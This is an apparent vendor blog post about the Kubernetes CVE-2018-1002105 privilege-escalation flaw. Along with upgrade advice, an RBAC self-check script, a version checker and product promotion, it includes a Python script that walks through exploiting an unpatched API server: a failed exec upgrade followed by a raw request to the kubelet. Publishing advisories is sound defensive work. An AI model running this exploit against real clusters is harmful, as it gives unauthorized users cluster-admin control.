Proxy Request Handling Vulnerability – What does it mean for you?
Earlier this week, a major Kubernetes vulnerability was disclosed (CVE-2018-1002105), a first for the increasingly popular, de-facto standard for container orchestration. Essentially, with a specially crafted request, a user who is authorized to establish a connection through the Kubernetes API server to a backend server can then send arbitrary requests over that same connection directly to the backend, authenticated with the TLS credentials the API server used to establish the backend connection.
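To make that mechanism concrete, here is a purely illustrative sketch of the request flow against an unpatched cluster. The hostname, port, bearer token, and pod name are placeholders, and this is a conceptual reconstruction rather than a tested exploit: the first request is an authorized exec upgrade that fails at the kubelet, and on a vulnerable API server the same socket then behaves as a raw tunnel to the kubelet.

```python
# Illustrative only: the request flow behind CVE-2018-1002105 against an
# UNPATCHED API server. Hostname, port, token, and pod name are placeholders.
import socket
import ssl

APISERVER = "apiserver.example.com"                 # placeholder
PORT = 6443
TOKEN = "<token-of-a-user-with-pods/exec-rights>"   # placeholder

ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE                     # illustration only

sock = ctx.wrap_socket(socket.create_connection((APISERVER, PORT)),
                       server_hostname=APISERVER)

# Phase 1: an authorized exec request with upgrade headers that is bound to
# fail at the kubelet (nonexistent container). The API server proxies it to
# the kubelet using its own TLS client credentials. The bug: when the upgrade
# fails, a vulnerable API server keeps the proxied connection open.
phase1 = (
    "POST /api/v1/namespaces/default/pods/some-pod/exec"
    "?container=does-not-exist&command=ls HTTP/1.1\r\n"
    f"Host: {APISERVER}\r\n"
    f"Authorization: Bearer {TOKEN}\r\n"
    "Connection: Upgrade\r\n"
    "Upgrade: websocket\r\n"
    "\r\n"
)
sock.sendall(phase1.encode())
print(sock.recv(4096).decode(errors="replace"))     # error response from the kubelet

# Phase 2: on a vulnerable cluster the same socket is now a raw pipe to the
# kubelet API, authenticated as the API server itself, so follow-up requests
# bypass the caller's own RBAC permissions entirely.
phase2 = "GET /runningpods/ HTTP/1.1\r\nHost: kubelet\r\n\r\n"
sock.sendall(phase2.encode())
print(sock.recv(65536).decode(errors="replace"))
```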
According to the latest version of the CVSS severity calculator, exploiting this vulnerability is of low complexity and requires no user interaction. Worse, if the vulnerability is being exploited, it is very hard to detect. A regular user with ‘exec,’ ‘attach,’ or ‘portforward’ rights on a Kubernetes pod can escalate their privileges to cluster-admin level and execute any process in a container.
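If you want to know whether a particular credential falls into that risk group, you can ask the API server directly. The sketch below uses the official Kubernetes Python client to issue SelfSubjectAccessReview checks for the exec, attach, and portforward subresources; the namespace and the use of your current kubeconfig context are assumptions for illustration.

```python
# pip install kubernetes
from kubernetes import client, config

def can_i(auth_api, subresource, namespace="default"):
    """Ask the API server whether the current credentials may create pods/<subresource>."""
    review = client.V1SelfSubjectAccessReview(
        spec=client.V1SelfSubjectAccessReviewSpec(
            resource_attributes=client.V1ResourceAttributes(
                namespace=namespace,
                verb="create",
                resource="pods",
                subresource=subresource,
            )
        )
    )
    return auth_api.create_self_subject_access_review(review).status.allowed

def main():
    config.load_kube_config()  # assumes your kubeconfig points at the cluster to check
    auth_api = client.AuthorizationV1Api()
    for sub in ("exec", "attach", "portforward"):
        allowed = can_i(auth_api, sub)
        print(f"pods/{sub}: {'allowed' if allowed else 'denied'}")

if __name__ == "__main__":
    main()
```

The same check can be run from the command line with, for example, `kubectl auth can-i create pods/exec`.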
What do you need to do?
Your best option is to upgrade to a fixed version as soon as possible. There are other mitigation options, but upgrading is the recommended one. If you are running a CIS-compliant cluster, you are slightly better off but still vulnerable. For those who want to know how this vulnerability can be exploited, the Appsecco post is a good resource. The following Kubernetes releases contain the fix (a quick version-check sketch follows the list):
- v1.10.11
- v1.11.5
- v1.12.3
- v1.13.0-rc.1
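As a quick sanity check against that list, here is a minimal sketch using the official Kubernetes Python client; it assumes your current kubeconfig context points at the cluster you want to inspect, and the version thresholds simply mirror the releases above.

```python
# pip install kubernetes
from kubernetes import client, config

# Minimum patched release per minor version (from the list above).
FIXED = {"1.10": (1, 10, 11), "1.11": (1, 11, 5), "1.12": (1, 12, 3), "1.13": (1, 13, 0)}

def parse(git_version):
    # e.g. "v1.11.4" -> (1, 11, 4); ignore build metadata such as "-rc.1" or provider suffixes
    core = git_version.lstrip("v").split("-")[0]
    return tuple(int(p) for p in core.split("."))

def main():
    config.load_kube_config()                  # uses your current kubeconfig context
    version = client.VersionApi().get_code()   # queries /version on the API server
    major, minor, patch = parse(version.git_version)
    fixed = FIXED.get(f"{major}.{minor}")
    if fixed is None:
        print(f"{version.git_version}: not a 1.10-1.13 release, check the advisories manually")
    elif (major, minor, patch) >= fixed:
        print(f"{version.git_version}: at or above the patched release")
    else:
        print(f"{version.git_version}: VULNERABLE, upgrade to v{'.'.join(map(str, fixed))} or later")

if __name__ == "__main__":
    main()
```

Managed offerings often append build metadata to the version string; the sketch simply ignores it, so treat the output as a hint rather than a verdict and confirm against your provider's advisory.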
Community Support
This is the first such major vulnerability found in the Kubernetes architecture, and it won’t be the last.
Kubernetes has remarkably robust community support, and this was evident in how quickly the fix was made available and communicated once the issue was identified. There have been arguments for commercially supported Kubernetes distributions, highlighting the risk for smaller DevOps teams using open source Kubernetes. The reality is that many Enterprises run the open source distribution and, if anything, can react faster, since fixes land in open source Kubernetes first. Many public managed service providers reacted no faster than any Enterprise customer could.
Lifecycle Management of Kubernetes Clusters
While Kubernetes is delivering on the promise of driving efficiencies within the Enterprise, life-cycle management of operating clusters is a complex endeavor that can involve a great deal of undifferentiated heavy lifting Enterprises can do without. And if you are managing clusters at scale across different distributions, e.g. a public managed service, on-premises clusters, and a curated distribution, you need to work out three different upgrade strategies.
This is where a single management plane for the life-cycle of your clusters and applications makes a lot of sense for Enterprises operating multiple clusters at scale or providing Kubernetes-as-a-Service as a central IT offering.
These are the problems Nirmata solves, by providing a single management plane that takes away the complexity of operating clusters and helps IT Ops, development, and DevOps teams leverage and operate Kubernetes based on the outcomes they are expected to deliver for the Enterprise.
An example of how Nirmata simplifies cluster operations is this Proxy Request Handling vulnerability: Nirmata customers can upgrade their clusters with a single click, simply by choosing the version they want to upgrade to, and Nirmata takes care of all the logistics involved in upgrading the clusters.
What Kubernetes offers is a mature platform that has seen many years of production use at scale. What Enterprises need are features that make it easy for them to adopt open source Kubernetes rather than a curated distribution.
Some key Nirmata features for cluster and application life-cycle management that meet Enterprise requirements include:
- Ensure your application deployments across clouds and on-premises are always compliant with corporate policy requirements.
- Stream cluster events and audit trails to your central repositories.
- Automate secrets management using key managers such as Vault.
- Use change management policies to control and track the flow of changes from CI/CD tools to your dev-test, staging, and production environments.
- Complete visibility into cluster and workload performance with integrated monitoring and logging features.
- Granular access control for teams, applications and environments.
- Flexible, multi-level isolation policies to ensure each application’s environment is fully segmented and isolated.
- Allocate and manage resource quotas for your teams and applications.
- Continuously monitor running applications and generate alerts for unexpected conditions.
- Create custom alarms for specific conditions, metrics, or state changes. Apply proactive actions based on specific alarms and thresholds.
- Use an integrated Cloud Shell to access your cluster and containers without requiring complex VPN or SSH.
- Apply policies to ensure consistent behaviors for cluster components and workloads.
What are your use cases for Kubernetes cluster and application life-cycle management? Let us know!
As always, your comments and feedback are highly appreciated. Please contact us here to start a conversation.